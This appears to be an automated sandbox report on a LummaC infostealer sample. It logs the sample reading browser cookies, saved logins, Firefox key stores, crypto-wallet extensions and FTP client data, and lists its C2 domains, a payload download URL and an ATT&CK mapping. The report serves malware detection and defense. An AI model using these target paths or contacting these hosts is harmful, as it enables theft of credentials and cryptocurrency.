Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\VWDFPKGDUF	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\VWDFPKGDUF	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\LIJDSFKJZG	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\VWDFPKGDUF	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\NWCXBPIUYI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\NYMMPCEIMA	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\VWDFPKGDUF	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\VWDFPKGDUF	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\LIJDSFKJZG	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\LIJDSFKJZG	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\NYMMPCEIMA	Jump to behavior

Source: Yara match	File source: 00000000.00000003.2129877489.00000000017E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2129358643.00000000017E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 1400, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: file.exe PID: 1400, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Windows Management Instrumentation	1 DLL Side-Loading	2 Process Injection	1 Masquerading	2 OS Credential Dumping	761 Security Software Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 DLL Side-Loading	41 Disable or Modify Tools	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	41 Data from Local System	11 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	2 Bypass User Account Control	361 Virtualization/Sandbox Evasion	Security Account Manager	361 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Process Injection	NTDS	1 File and Directory Discovery	Distributed Component Object Model	Input Capture	124 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	223 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	3 Obfuscated Files or Information	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	2 Bypass User Account Control	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
file.exe	37%	ReversingLabs	Win32.Infostealer.Tinba
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
http://crl.rootca1.amazontrust.com/rootca1.crl0	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg	0%	URL Reputation	safe
http://x1.c.lencr.org/0	0%	URL Reputation	safe
http://x1.i.lencr.org/0	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://crt.rootca1.amazontrust.com/rootca1.cer0?	0%	URL Reputation	safe
https://support.mozilla.org/products/firefoxgro.all	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
crisiwarny.store	104.21.95.91	true	true		unknown
presticitpo.store	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Reputation
presticitpo.store	true	unknown
scriptyprefej.store	true	unknown
https://crisiwarny.store/api	true	unknown
necklacedmny.store	true	unknown
fadehairucw.store	true	unknown
navygenerayk.store	true	unknown
founpiuer.store	true	unknown
thumbystriw.store	true	unknown
crisiwarny.store	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	file.exe, 00000000.00000003.2084212152.0000000005DCC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084274235.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084373731.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.microP	file.exe, 00000000.00000003.2253625013.00000000017C8000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://crisiwarny.store/a	file.exe, 00000000.00000003.2129448417.00000000017DD000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://duckduckgo.com/ac/?q=	file.exe, 00000000.00000003.2084212152.0000000005DCC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084274235.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084373731.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	file.exe, 00000000.00000003.2084212152.0000000005DCC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084274235.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084373731.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	file.exe, 00000000.00000003.2111402565.0000000005E29000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	file.exe, 00000000.00000003.2084212152.0000000005DCC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084274235.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084373731.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.rootca1.amazontrust.com/rootca1.crl0	file.exe, 00000000.00000003.2110155391.0000000005E9D000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	file.exe, 00000000.00000003.2084212152.0000000005DCC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084274235.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084373731.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.16/off/def.exeM	file.exe, 00000000.00000002.2262641819.00000000017CD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2253625013.00000000017C8000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://ocsp.rootca1.amazontrust.com0:	file.exe, 00000000.00000003.2110155391.0000000005E9D000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://www.ecosia.org/newtab/	file.exe, 00000000.00000003.2084212152.0000000005DCC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084274235.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084373731.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
